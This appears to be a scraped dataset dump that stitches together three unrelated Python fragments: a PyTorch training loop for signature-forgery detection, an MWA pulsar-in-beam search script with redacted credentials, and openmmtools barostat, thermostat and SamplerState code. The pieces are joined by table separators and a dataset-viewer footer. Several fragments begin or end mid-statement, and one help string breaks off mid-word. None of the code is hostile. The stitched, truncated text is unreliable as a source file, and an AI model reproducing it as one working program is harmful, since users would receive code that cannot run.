if args.forg:
print('Epoch {}. Val loss: {:.4f}, Val acc: {:.2f}%,'
'Val forg loss: {:.4f}, Val forg acc: {:.2f}%'.format(epoch, val_loss,
val_acc * 100,
val_forg_loss,
val_forg_acc * 100))
else:
print('Epoch {}. Val loss: {:.4f}, Val acc: {:.2f}%'.format(epoch, val_loss, val_acc * 100))
if logdir is not None:
current_params = get_parameters(base_model, classification_layer, forg_layer)
torch.save(current_params, logdir / 'model_last.pth')
if callback:
callback.save(logdir / 'train_curves.pickle')
return best_params
def copy_to_cpu(weights: Dict[str, Any]):
return OrderedDict([(k, v.cpu()) for k, v in weights.items()])
def get_parameters(base_model, classification_layer, forg_layer):
best_params = (copy_to_cpu(base_model.state_dict()),
copy_to_cpu(classification_layer.state_dict()),
copy_to_cpu(forg_layer.state_dict()))
return best_params
def train_epoch(train_loader: torch.utils.data.DataLoader,
base_model: torch.nn.Module,
classification_layer: torch.nn.Module,
forg_layer: torch.nn.Module,
epoch: int,
optimizer: torch.optim.Optimizer,
lr_scheduler: torch.optim.lr_scheduler._LRScheduler,
callback: Optional[VisdomLogger],
device: torch.device,
args: Any):
""" Trains the network for one epoch
Parameters
----------
train_loader: torch.utils.data.DataLoader
Iterable that loads the training set (x, y) tuples
base_model: torch.nn.Module
The model architecture that "extract features" from signatures
classification_layer: torch.nn.Module
The classification layer (from features to predictions of which user
wrote the signature)
forg_layer: torch.nn.Module
The forgery prediction layer (from features to predictions of whether
the signature is a forgery). Only used in args.forg = True
epoch: int
The current epoch (used for reporting)
optimizer: torch.optim.Optimizer
The optimizer (already initialized)
lr_scheduler: torch.optim.lr_scheduler._LRScheduler
The learning rate scheduler
callback: VisdomLogger (optional)
A callback to report the training progress
device: torch.device
The device (CPU or GPU) to use for training
args: Namespace
Extra arguments used for training:
args.forg: bool
Whether forgeries are being used for training
args.lamb: float
The weight used for the forgery loss (training with forgeries only)
Returns
-------
None
"""
step = 0
n_steps = len(train_loader)
for batch in train_loader:
x, y = batch[0], batch[1]
x = torch.tensor(x, dtype=torch.float).to(device)
y = torch.tensor(y, dtype=torch.long).to(device)
yforg = torch.tensor(batch[2], dtype=torch.long).to(device)
# Forward propagation
features = base_model(x)
if args.forg:
if args.loss_type == 'L1':
# Eq (3) in https://arxiv.org/abs/1705.05787
logits = classification_layer(features)
class_loss = F.cross_entropy(logits, y)
forg_logits = forg_layer(features).squeeze()
forg_loss = F.binary_cross_entropy_with_logits(forg_logits, yforg)
loss = (1 - args.lamb) * class_loss
loss += args.lamb * forg_loss
else:
# Eq (4) in https://arxiv.org/abs/1705.05787
logits = classification_layer(features[yforg == 0])
class_loss = F.cross_entropy(logits, y[yforg == 0])
forg_logits = forg_layer(features)
forg_loss = F.cross_entropy(forg_logits, yforg)
loss = (1 - args.lamb) * class_loss
loss += args.lamb * forg_loss
else:
# Eq (1) in https://arxiv.org/abs/1705.05787
logits = classification_layer(features)
loss = class_loss = F.cross_entropy(logits, y)
# Back propagation
optimizer.zero_grad()
loss.backward()
torch.nn.utils.clip_grad_value_(optimizer.param_groups[0]['params'], 10)
# Update weights
optimizer.step()
# Logging
if callback and step % 100 == 0:
iteration = epoch + (step / n_steps)
callback.scalar('class_loss', iteration, class_loss.detach())
pred = logits.argmax(1)
acc = y[yforg == 0].eq(pred).float().mean()
callback.scalar('train_acc', epoch + (step / n_steps), acc.detach())
if args.forg:
forg_pred = forg_logits > 0
forg_acc = yforg.long().eq(forg_pred.long()).float().mean()
callback.scalar('forg_loss', iteration, forg_loss.detach())
callback.scalar('forg_acc', iteration, forg_acc.detach())
step += 1
lr_scheduler.step()
def test(val_loader: torch.utils.data.DataLoader,
base_model: torch.nn.Module,
classification_layer: torch.nn.Module,
device: torch.device,
is_forg: bool,
forg_layer: Optional[torch.nn.Module] = None) -> Tuple[float, float, float, float]:
""" Test the model in a validation/test set
Parameters
----------
val_loader: torch.utils.data.DataLoader
Iterable that loads the validation set (x, y) tuples
base_model: torch.nn.Module
The model architecture that "extract features" from signatures
classification_layer: torch.nn.Module
The classification layer (from features to predictions of which user
wrote the signature)
device: torch.device
The device (CPU or GPU) to use for training
is_forg: bool
Whether or not forgeries are being used for training/testing
forg_layer: torch.nn.Module
The forgery prediction layer (from features to predictions of whether
the signature is a forgery). Only used in is_forg = True
Returns
-------
float, float
The valication accuracy and validation loss
"""
val_losses = []
val_accs = []
val_forg_losses = []
val_forg_accs = []
for batch in val_loader:
x, y, yforg = batch[0], batch[1], batch[2]
x = torch.tensor(x, dtype=torch.float).to(device)
y = torch.tensor(y, dtype=torch.long).to(device)
yforg = torch.tensor(yforg, dtype=torch.long).to(device)
with torch.no_grad():
features = base_model(x)
logits = classification_layer(features[yforg == 0])
loss = F.cross_entropy(logits, y[yforg == 0])
pred = logits.argmax(1)
acc = y[yforg == 0].eq(pred).float().mean()
if is_forg:
forg_logits = forg_layer(features)
forg_loss = F.cross_entropy(forg_logits, yforg)
forg_pred = forg_logits.argmax(1)
forg_acc = yforg.long().eq(forg_pred.long()).float().mean()
val_forg_losses.append(forg_loss.item())
val_forg_accs.append(forg_acc.item())
val_losses.append(loss.item())
val_accs.append(acc.item())
val_loss = np.mean(val_losses)
val_acc = np.mean(val_accs)
val_forg_loss = np.mean(val_forg_losses) if len(val_forg_losses) > 0 else np.nan
val_forg_acc= np.mean(val_forg_accs) if len(val_forg_accs) > 0 else np.nan
return val_acc.item(), val_loss.item(), val_forg_acc.item(), val_forg_loss.item()
def main(args):
# Setup logging
logdir = pathlib.Path(args.logdir)
if not logdir.exists():
logdir.mkdir()
if args.visdomport is not None:
logger = VisdomLogger(port=args.visdomport)
else:
logger = None
device = torch.device('cuda', args.gpu_idx) if torch.cuda.is_available() else torch.device('cpu')
print('Using device: {}'.format(device))
torch.manual_seed(args.seed)
if torch.cuda.is_available():
torch.cuda.manual_seed_all(args.seed)
print('Loading Data')
x, y, yforg, usermapping, filenames = util.load_dataset(args.dataset_path)
data = util.get_subset((x, y, yforg), subset=range(*args.users))
if not args.forg:
data = util.remove_forgeries(data, forg_idx=2)
train_loader, val_loader = setup_data_loaders(data, args.batch_size, args.input_size)
print('Initializing Model')
n_classes = len(np.unique(data[1]))
base_model = models.available_models[args.model]().to(device)
classification_layer = nn.Linear(base_model.feature_space_size, n_classes).to(device)
if args.forg:
forg_layer = nn.Linear(base_model.feature_space_size, 3).to(device)
else:
forg_layer = nn.Module() # Stub module with no parameters
if args.test:
print('Testing')
base_model_params, classification_params, forg_params = torch.load(args.checkpoint)
base_model.load_state_dict(base_model_params)
classification_layer.load_state_dict(classification_params)
if args.forg:
forg_layer.load_state_dict(forg_params)
val_acc, val_loss, val_forg_acc, val_forg_loss = test(val_loader, base_model, classification_layer,
device, args.forg, forg_layer)
if args.forg:
print('Val loss: {:.4f}, Val acc: {:.2f}%,'
'Val forg loss: {:.4f}, Val forg acc: {:.2f}%'.format(val_loss,
val_acc * 100,
val_forg_loss,
val_forg_acc * 100))
else:
print('Val loss: {:.4f}, Val acc: {:.2f}%'.format(val_loss, val_acc * 100))
else:
print('Training')
train(base_model, classification_layer, forg_layer, train_loader, val_loader,
device, logger, args, logdir)
def setup_data_loaders(data, batch_size, input_size):
label_encoder = LabelEncoder()
y = label_encoder.fit_transform(data[1])
data = TensorDataset(torch.from_numpy(data[0]), torch.from_numpy(y), torch.from_numpy(data[2]))
train_size = int(0.9 * len(data))
sizes = (train_size, len(data) - train_size)
train_set, test_set = random_split(data, sizes)
train_transforms = transforms.Compose([
transforms.ToPILImage(),
transforms.RandomCrop(input_size),
transforms.ToTensor(),
])
train_set = TransformDataset(train_set, train_transforms)
val_transforms = transforms.Compose([
transforms.ToPILImage(),
transforms.CenterCrop(input_size),
transforms.ToTensor(),
])
test_set = TransformDataset(test_set, val_transforms)
train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=True)
val_loader = DataLoader(test_set, batch_size=batch_size)
return train_loader, val_loader
if __name__ == '__main__':
argparser = argparse.ArgumentParser('Train Signet/F')
argparser.add_argument('--dataset-path', help='Path containing a numpy file with images and labels')
argparser.add_argument('--input-size', help='Input size (cropped)', nargs=2, type=int, default=(150, 220))
argparser.add_argument('--users', nargs=2, type=int, default=(350, 881))
argparser.add_argument('--model', help='Model architecture', choices=models.available_models, required=True)
argparser.add_argument('--batch-size', help='Batch size', type=int, default=32)
argparser.add_argument('--lr', help='learning rate', default=0.001, type=float)
argparser.add_argument('--lr-decay', help='learning | |
<gh_stars>1-10
#! /usr/bin/env python3
"""
Author: <NAME>
Creation Date: /03/2016
Some of the orignal code was created by <NAME>
This code is used to list the sources within the beam of observations IDs or using --obs_for_source list all the observations for each source. The sources can be input serval ways: using a list of pulsar names (--pulsar), using a complete catalogue file of pulsars (--dl_PSRCAT) or RRATs (--RRAT and --dl_RRAT), using a compatable catalogue (--in_cat with the help of --names and --coordstype) or using a RA and DEC coordinate (--coords). The observation IDs can be input (--obsid) or gathered from a directory (--FITS_dir). The default is to search all observation IDs from http://mwa-metadata01.pawsey.org.au/metadata/ that have voltages and list every known pulsar from PSRCAT in each observation ID.
Two most comon uses for this code is to search a single observation ID for pulsars like so:
> find_pulsar_in_obs.py -o 1099414416
which will output a text file called 1099414416_analytic_beam.txt
or to search all observation IDs for a single pulsar like so:
> find_pulsar_in_obs.py -p J0534+2200 --obs_for_source
which will output a text file called J0534+2200_analytic_beam.txt
"""
__author__ = '<NAME>'
__date__ = '2016-03-21'
import os
import sys
import argparse
import numpy as np
import csv
from vcstools.pointing_utils import sex2deg, format_ra_dec
import vcstools.sn_flux_utils as sfe
from vcstools.metadb_utils import get_obs_array_phase, singles_source_search,\
find_obsids_meta_pages, obs_max_min
from vcstools.catalogue_utils import grab_source_alog
from vcstools.beam_calc import find_sources_in_obs
import logging
logger = logging.getLogger(__name__)
class NoSourcesError(Exception):
"""Raise when no sources are found for any reason"""
pass
def yes_no(answer):
yes = set(['Y','yes','y', 'ye', ''])
no = set(['N','no','n'])
while True:
choice = input(answer).lower()
if choice in yes:
return True
elif choice in no:
return False
else:
logger.warning("Please respond with 'yes' or 'no'\n")
def cal_on_database_check(obsid):
from mwa_pulsar_client import client
web_address = 'https://mwa-pawsey-volt01.pawsey.org.au'
auth = ('<PASSWORD>','<PASSWORD>=')
detection_list = client.detection_list(web_address, auth)
cal_used = False
cal_avail = False
for d in detection_list:
if int(d[u'observationid']) == int(obsid):
if d[u'calibrator'] is not None:
cal_used = True
#TODO add a check if there is a cal file option
#No cal
check_result = 'N'
if cal_avail:
#Cal available
check_result = 'A'
elif cal_used:
#Cal used
check_result = 'U'
return check_result
def write_output_source_files(output_data,
beam='analytic', min_power=0.3, cal_check=False,
SN_est=False, flux_est=False, plot_est=False,
min_time=0):
"""
Writes an ouput file using the output of find_sources_in_obs when obs_for_source is true.
"""
for source in output_data:
out_name = "{0}_{1}_beam.txt".format(source, beam)
with open(out_name,"w") as output_file:
output_file.write('#All of the observation IDs that the {0} beam model '
'calculated a power of {1} or greater for the source: '
'{2}\n'.format(beam, min_power, source))
output_file.write('#Column headers:\n')
output_file.write('#Obs ID: Observation ID\n')
output_file.write('#Dur: The duration of the observation in seconds\n')
output_file.write('#Enter: The fraction of the observation when '
'the source entered the beam\n')
output_file.write('#Exit: The fraction of the observation when '
'the source exits the beam\n')
output_file.write('#Power: The maximum zenith normalised power of the source.\n')
output_file.write("#OAP: The observation's array phase where P1 is the "
"phase 1 array, P2C is the phase compact array "
"and P2E is the phase 2 extended array.\n")
output_file.write("#Freq: The centre frequency of the observation in MHz\n")
output_file.write("#Band: Bandwidth of the observation in MHz. If it is greater "
"than 30.72 than it is a picket fence observation\n")
if SN_est:
output_file.write("#S/N Est: An estimate of the expected signal to noise using ANTF flux desnities\n")
output_file.write("#S/N Err: The uncertainty of S/N Est\n")
if flux_est:
output_file.write("#Flux Est: An estimate of the expected flux density (mJy) using ANTF flux desnities\n")
output_file.write("#Flux Err: The uncertainty of Flux Est (mJy)\n")
if cal_check:
output_file.write('#Cal ID: Observation ID of an available '+\
'calibration solution\n')
output_file.write('#Obs ID |Dur |Enter|Exit |Power| OAP | Freq | Band ')
if SN_est:
output_file.write("|S/N Est|S/N Err")
if flux_est:
output_file.write("|Flux Est|Flux Err")
if cal_check:
output_file.write("|Cal ID\n")
else:
output_file.write('\n')
for data in output_data[source]:
obsid, duration, enter, leave, max_power, freq, band = data
if duration > min_time:
if SN_est:
beg, end = obs_max_min(obsid)
oap = get_obs_array_phase(obsid)
output_file.write('{} {:4d} {:1.3f} {:1.3f} {:1.3f} {:.3} {:6.2f} {:6.2f}'.\
format(obsid, duration, enter, leave, max_power, oap, freq, band))
if SN_est:
pulsar_sn, pulsar_sn_err, _, _ = sfe.est_pulsar_sn(source, obsid, beg, end, plot_flux=plot_est)
if pulsar_sn is None:
output_file.write(' None None')
else:
output_file.write(' {:9.2f} {:9.2f}'.format(pulsar_sn, pulsar_sn_err))
if flux_est:
pulsar_flux, pulsar_flux_err = sfe.est_pulsar_flux(source, obsid, plot_flux=plot_est)
if pulsar_flux is None:
output_file.write(' None None')
else:
output_file.write(' {:8.2f} {:8.2f}'.format(pulsar_flux*1000, pulsar_flux_err*1000))
if cal_check:
#checks the MWA Pulsar Database to see if the obsid has been
#used or has been calibrated
logger.info("Checking the MWA Pulsar Databse for the obsid: {0}".format(obsid))
cal_check_result = cal_on_database_check(obsid)
output_file.write(" {0}\n".format(cal_check_result))
else:
output_file.write("\n")
return
def write_output_obs_files(output_data, obsid_meta,
beam='analytic', min_power=0.3,
cal_check=False,
SN_est=False, flux_est=False, plot_est=False,
min_time=0):
"""
Writes an ouput file using the output of find_sources_in_obs when obs_for_source is false.
"""
for on, obsid in enumerate(output_data):
if SN_est or flux_est:
beg, end = obs_max_min(obsid)
psr_list = [el[0] for el in output_data[obsid]]
sn_dict = sfe.multi_psr_snfe(psr_list, obsid, beg, end,\
min_z_power=min_power, plot_flux=plot_est)
oap = get_obs_array_phase(obsid)
out_name = "{0}_{1}_beam.txt".format(obsid, beam)
with open(out_name,"w") as output_file:
output_file.write('#All of the sources that the {0} beam model calculated a power'
'of {1} or greater for observation ID: {2}\n'.format(beam,
min_power, obsid))
output_file.write('#Observation data :RA(deg): {0} DEC(deg): {1} Duration(s): '
'{2} Array Phase: {3}\n'.format(obsid_meta[on][1],
obsid_meta[on][2], obsid_meta[on][3], oap))
if cal_check:
#checks the MWA Pulsar Database to see if the obsid has been
#used or has been calibrated
logger.info("Checking the MWA Pulsar Databse for the obsid: {0}".format(obsid))
cal_check_result = cal_on_database_check(obsid)
output_file.write("#Calibrator Availability: {0}\n".format(cal_check_result))
output_file.write('#Column headers:\n')
output_file.write('#Source: Pulsar Jname\n')
output_file.write('#Enter: The fraction of the observation when '+\
'the source entered the beam\n')
output_file.write('#Exit: The fraction of the observation when '+\
'the source exits the beam\n')
output_file.write('#Power: The maximum zenith normalised power of the source.\n')
if SN_est:
output_file.write("#S/N Est: An estimate of the expected signal to noise using ANTF flux desnities\n")
output_file.write("#S/N Err: The uncertainty of S/N Est\n")
if flux_est:
output_file.write("#Flux Est: An estimate of the expected flux density (mJy) using ANTF flux desnities\n")
output_file.write("#Flux Err: The uncertainty of Flux Est (mJy)\n")
output_file.write('#Source |Enter|Exit |Power')
if SN_est:
output_file.write('| S/N Est | S/N Err')
if flux_est:
output_file.write("|Flux Est|Flux Err")
output_file.write('\n')
for data in output_data[obsid]:
pulsar, enter_beam, exit_beam, max_power = data
if (exit_beam - enter_beam) * obsid_meta[on][3] > min_time:
output_file.write('{:11} {:1.3f} {:1.3f} {:1.3f} '.format(pulsar,
enter_beam, exit_beam, max_power))
if SN_est:
pulsar_sn, pulsar_sn_err, _, _ = sn_dict[pulsar]
if pulsar_sn is None:
output_file.write(' None None')
else:
output_file.write('{:9.2f} {:9.2f}'.format(pulsar_sn, pulsar_sn_err))
if flux_est:
_, _, pulsar_flux, pulsar_flux_err = sn_dict[pulsar]
if pulsar_flux is None:
output_file.write(' None None')
else:
output_file.write('{:8.2f} {:8.2f}'.format(pulsar_flux*1000, pulsar_flux_err*1000))
output_file.write('\n')
return
if __name__ == "__main__":
# Dictionary for choosing log-levels
loglevels = dict(DEBUG=logging.DEBUG,
INFO=logging.INFO,
WARNING=logging.WARNING)
beam_models = ['analytic', 'advanced', 'full_EE']
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description="""
This code is used to list the sources within the beam of observations IDs or using --obs_for_source list all the observations for each source. The sources can be input serval ways: using a list of pulsar names (--pulsar), using a complete catalogue file of pulsars (--dl_PSRCAT) or RRATs (--RRAT and --dl_RRAT), using a compatable catalogue (--in_cat with the help of --names and --coordstype) or using a RA and DEC coordinate (--coords). The observation IDs can be input (--obsid) or gathered from a directory (--FITS_dir). The default is to search all observation IDs from http://mwa-metadata01.pawsey.org.au/metadata/ that have voltages and list every known pulsar from PSRCAT in each observation ID.
""")
parser.add_argument('--obs_for_source', action='store_true',
help='Instead of listing all the sources in each observation it will list all of the observations for each source. For increased efficiency it will only search OBSIDs within the primary beam.')
parser.add_argument('-b', '--beam', type=str, default = 'analytic',
help='Decides the beam approximation that will be used. Options: "analytic" the analytic beam model (2012 model, fast and reasonably accurate), "advanced" the advanced beam model (2014 model, fast and slighty more accurate) or "full_EE" the full EE model (2016 model, slow but accurate). " Default: "analytic"')
parser.add_argument('-m', '--min_power', type=float, default=0.3,
help='The minimum fraction of the zenith normalised power that a source needs to have to be recorded. Default 0.3')
parser.add_argument('--sn_est', action='store_true',
help='Make a expected signal to noise calculation using the flux densities from the ANTF pulsar catalogue and include them in the output file. Default: False.')
parser.add_argument('--flux_est', action='store_true',
help='Make a expected flux density calculation using the flux densities from the ANTF pulsar catalogue and include | |
OpenMM 7.1
barostat_temperature = barostat.getTemperature()
barostat_pressure = self._get_barostat_pressure(barostat)
barostat_surface_tension = self._get_barostat_surface_tension(barostat)
is_consistent = self._is_barostat_type_consistent(barostat)
is_consistent = is_consistent and utils.is_quantity_close(barostat_temperature, self.temperature)
is_consistent = is_consistent and utils.is_quantity_close(barostat_pressure, self.pressure)
if barostat is not None and self._surface_tension is not None:
is_consistent = is_consistent and utils.is_quantity_close(barostat_surface_tension, self._surface_tension)
else:
is_consistent = is_consistent and (barostat_surface_tension == self._surface_tension) # both None
return is_consistent
def _set_system_pressure(self, system, pressure):
"""Add or configure the system barostat to the given pressure.
If a new barostat is added, its temperature is set to
self.temperature.
Parameters
----------
system : simtk.openmm.System
The system's barostat will be added/configured.
pressure : simtk.unit.Quantity or None
The pressure with units compatible to bars. If None, the
barostat of the system is removed.
Raises
------
ThermodynamicsError
If pressure needs to be set for a non-periodic system.
"""
if pressure is None: # If new pressure is None, remove barostat.
self._pop_barostat(system)
return
if not system.usesPeriodicBoundaryConditions():
raise ThermodynamicsError(ThermodynamicsError.BAROSTATED_NONPERIODIC)
barostat = self._find_barostat(system)
if barostat is None: # Add barostat
barostat = openmm.MonteCarloBarostat(pressure, self.temperature)
system.addForce(barostat)
else: # Set existing barostat
self._set_barostat_pressure(barostat, pressure)
@staticmethod
def _set_barostat_pressure(barostat, pressure):
"""Set barostat pressure."""
if isinstance(pressure, unit.Quantity):
pressure = pressure.value_in_unit(unit.bar)
if isinstance(barostat, openmm.MonteCarloAnisotropicBarostat):
barostat.setDefaultPressure(openmm.Vec3(pressure, pressure, pressure)*unit.bar)
else:
barostat.setDefaultPressure(pressure*unit.bar)
@staticmethod
def _set_barostat_pressure_in_context(barostat, pressure, context):
"""Set barostat pressure."""
if isinstance(barostat, openmm.MonteCarloAnisotropicBarostat):
p = pressure.value_in_unit(unit.bar)
context.setParameter(barostat.Pressure(), openmm.Vec3(p, p, p)*unit.bar)
else:
context.setParameter(barostat.Pressure(), pressure)
@staticmethod
def _get_barostat_pressure(barostat):
"""Set barostat pressure."""
if isinstance(barostat, openmm.MonteCarloAnisotropicBarostat):
scaled = [barostat.getScaleX(), barostat.getScaleY(), barostat.getScaleZ()]
first_scaled_axis = scaled.index(True)
return barostat.getDefaultPressure()[first_scaled_axis]
else:
return barostat.getDefaultPressure()
@staticmethod
def _set_barostat_temperature(barostat, temperature):
"""Set barostat temperature."""
barostat.setDefaultTemperature(temperature)
def _set_system_surface_tension(self, system, gamma):
"""Set system surface tension"""
if gamma is not None and not system.usesPeriodicBoundaryConditions():
raise ThermodynamicsError(ThermodynamicsError.BAROSTATED_NONPERIODIC)
barostat = self._find_barostat(system)
if (gamma is None) == isinstance(barostat, openmm.MonteCarloMembraneBarostat):
raise ThermodynamicsError(ThermodynamicsError.INCOMPATIBLE_ENSEMBLE)
self._set_barostat_surface_tension(barostat, gamma)
def _set_barostat_surface_tension(self, barostat, gamma):
# working around a bug in the unit conversion https://github.com/openmm/openmm/issues/2406
if isinstance(gamma, unit.Quantity):
gamma = gamma.value_in_unit(unit.bar * unit.nanometer)
if isinstance(barostat, openmm.MonteCarloMembraneBarostat):
barostat.setDefaultSurfaceTension(gamma)
elif gamma is not None:
raise ThermodynamicsError(ThermodynamicsError.SURFACE_TENSION_NOT_SUPPORTED)
def _get_barostat_surface_tension(self, barostat):
if isinstance(barostat, openmm.MonteCarloMembraneBarostat):
return barostat.getDefaultSurfaceTension()
else:
return None
@staticmethod
def _set_barostat_surface_tension_in_context(barostat, surface_tension, context):
"""Set barostat surface tension."""
# work around a unit conversion issue in openmm
if isinstance(surface_tension, unit.Quantity):
surface_tension = surface_tension.value_in_unit(unit.nanometer*unit.bar)
try:
context.getParameter(barostat.SurfaceTension())
except Exception:
raise ThermodynamicsError(ThermodynamicsError.INCOMPATIBLE_ENSEMBLE)
context.setParameter(barostat.SurfaceTension(), surface_tension)
# -------------------------------------------------------------------------
# Internal-usage: thermostat handling
# -------------------------------------------------------------------------
@classmethod
def _find_thermostat(cls, system, get_index=False):
"""Return the first thermostat in the system.
Returns
-------
force_idx : int or None, optional
The force index of the thermostat.
thermostat : OpenMM Force object or None
The thermostat in system, or None if no thermostat is found.
"""
try:
force_idx, thermostat = forces.find_forces(system, '.*Thermostat.*', only_one=True)
except forces.MultipleForcesError:
raise ThermodynamicsError(ThermodynamicsError.MULTIPLE_THERMOSTATS)
except forces.NoForceFoundError:
force_idx, thermostat = None, None
if get_index:
return force_idx, thermostat
return thermostat
@classmethod
def _remove_thermostat(cls, system):
"""Remove the system thermostat."""
thermostat_idx, thermostat = cls._find_thermostat(system, get_index=True)
if thermostat_idx is not None:
system.removeForce(thermostat_idx)
@classmethod
def _set_system_temperature(cls, system, temperature):
"""Configure thermostat and barostat to the given temperature.
The thermostat temperature is set, or a new AndersenThermostat
is added if it doesn't exist.
Parameters
----------
system : simtk.openmm.System
The system to modify.
temperature : simtk.unit.Quantity
The temperature for the thermostat.
"""
thermostat = cls._find_thermostat(system)
if thermostat is None:
thermostat = openmm.AndersenThermostat(temperature, 1.0/unit.picosecond)
system.addForce(thermostat)
else:
thermostat.setDefaultTemperature(temperature)
barostat = cls._find_barostat(system)
if barostat is not None:
cls._set_barostat_temperature(barostat, temperature)
# -------------------------------------------------------------------------
# Internal-usage: initialization
# -------------------------------------------------------------------------
@staticmethod
def _compute_reduced_potential(potential_energy, temperature, volume, pressure, area_xy=None, surface_tension=None):
"""Convert potential energy into reduced potential."""
beta = 1.0 / (unit.BOLTZMANN_CONSTANT_kB * temperature)
reduced_potential = potential_energy / unit.AVOGADRO_CONSTANT_NA
if pressure is not None:
reduced_potential += pressure * volume
if area_xy is not None and surface_tension is not None:
reduced_potential -= surface_tension * area_xy
return beta * reduced_potential
def _find_force_groups_to_update(self, context, thermodynamic_state, memo):
"""Find the force groups to be recomputed when moving to the given state.
With the current implementation of ThermodynamicState, no force group has
to be recomputed as only temperature and pressure change between compatible
states, but this method becomes essential in CompoundThermodynamicState.
"""
return set()
# =============================================================================
# SAMPLER STATE
# =============================================================================
class SamplerState(object):
"""State carrying the configurational properties of a system.
Represent the portion of the state of a Context that changes with
integration. When initialized through the normal constructor, the
object is only partially defined as the energy attributes are None
until the SamplerState is updated with update_from_context. The
state can still be applied to a newly created context to set its
positions, velocities and box vectors. To initialize all attributes,
use the alternative constructor from_context.
Parameters
----------
positions : Nx3 simtk.unit.Quantity
Position vectors for N particles (length units).
velocities : Nx3 simtk.unit.Quantity, optional
Velocity vectors for N particles (velocity units).
box_vectors : 3x3 simtk.unit.Quantity
Current box vectors (length units).
Attributes
----------
positions
velocities
box_vectors : 3x3 simtk.unit.Quantity.
Current box vectors (length units).
potential_energy
kinetic_energy
total_energy
volume
n_particles
collective_variables
Examples
--------
>>> from openmmtools import testsystems
>>> toluene_test = testsystems.TolueneVacuum()
>>> sampler_state = SamplerState(toluene_test.positions)
At this point only the positions are defined
>>> sampler_state.velocities is None
True
>>> sampler_state.total_energy is None
True
but it can still be used to set up a context
>>> temperature = 300.0*unit.kelvin
>>> thermodynamic_state = ThermodynamicState(toluene_test.system, temperature)
>>> integrator = openmm.VerletIntegrator(1.0*unit.femtosecond)
>>> context = thermodynamic_state.create_context(integrator)
>>> sampler_state.apply_to_context(context) # Set initial positions.
A SamplerState cannot be updated by an incompatible context
which here is defined as having the same number of particles
>>> hostguest_test = testsystems.HostGuestVacuum()
>>> incompatible_state = ThermodynamicState(hostguest_test.system, temperature)
>>> integrator2 = openmm.VerletIntegrator(1.0*unit.femtosecond)
>>> incompatible_context = incompatible_state.create_context(integrator2)
>>> incompatible_context.setPositions(hostguest_test.positions)
>>> sampler_state.is_context_compatible(incompatible_context)
False
>>> sampler_state.update_from_context(incompatible_context)
Traceback (most recent call last):
...
openmmtools.states.SamplerStateError: Specified positions with inconsistent number of particles.
Create a new SamplerState instead
>>> sampler_state2 = SamplerState.from_context(context)
>>> sampler_state2.potential_energy is not None
True
It is possible to slice a sampler state to obtain positions and
particles of a subset of atoms
>>> sliced_sampler_state = sampler_state[:10]
>>> sliced_sampler_state.n_particles
10
"""
# -------------------------------------------------------------------------
# Public interface
# -------------------------------------------------------------------------
def __init__(self, positions, velocities=None, box_vectors=None):
# Allocate variables, they get set in _initialize
self._positions = None
self._velocities = None
self._box_vectors = None
self._collective_variables = None
self._kinetic_energy = None
self._potential_energy = None
args = []
for input in [positions, velocities, box_vectors]:
if isinstance(input, unit.Quantity) and not isinstance(input._value, np.ndarray):
args.append(np.array(input/input.unit)*input.unit)
else:
args.append(copy.deepcopy(input))
self._initialize(*args)
@classmethod
def from_context(cls, context_state, ignore_collective_variables=False):
"""Alternative constructor.
Read all the configurational properties from a Context object or
an OpenMM State object. This guarantees that all attributes
(including energy attributes) are initialized.
Parameters
----------
context_state : simtk.openmm.Context or simtk.openmm.State
The object to read. If a State object, it must contain information
about positions, velocities and energy.
ignore_collective_variables : bool, optional
If True, the collective variables are not updated from the
Context, and will be invalidated. If a State is passed in,
this raises an error if False, otherwise, it would be ambiguous
between a State tied to a System with collective variables, and one without.
Returns
-------
sampler_state : SamplerState
A new SamplerState object.
"""
sampler_state = cls([])
sampler_state._read_context_state(context_state, check_consistency=False,
ignore_positions=False,
ignore_velocities=False,
ignore_collective_variables=ignore_collective_variables)
return sampler_state
@property
def positions(self):
"""Particle positions.
An Nx3 simtk.unit.Quantity object, where N is the number of
particles.
Raises
------
SamplerStateError
If set to an array with a number of particles different
than n_particles.
"""
return self._positions
@positions.setter
def positions(self, value):
self._set_positions(value, from_context=False, check_consistency=True)
@property
def velocities(self):
"""Particle velocities.
An Nx3 simtk.unit.Quantity object, where N is the number of
particles.
Raises
------
SamplerStateError
If set to an array with a number of particles different
than n_particles.
"""
return self._velocities
@velocities.setter
def velocities(self, value):
self._set_velocities(value, from_context=False)
@property
def box_vectors(self):
"""Box vectors.
An 3x3 simtk.unit.Quantity object.
"""
return self._box_vectors
@box_vectors.setter
def box_vectors(self, value):
# Make sure this is a Quantity. System.getDefaultPeriodicBoxVectors
# returns a list of Quantity objects instead for example.
if value is not None and not isinstance(value, unit.Quantity):
value = unit.Quantity(value)
self._box_vectors = value
# Derived properties
@property
def potential_energy(self):
"""simtk.unit.Quantity or None: Potential energy of this configuration."""
if self._are_positions_valid:
return None
return self._potential_energy
@potential_energy.setter
def potential_energy(self, new_value):
if new_value is not None:
raise AttributeError("Cannot set potential energy as it is a function of Context")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.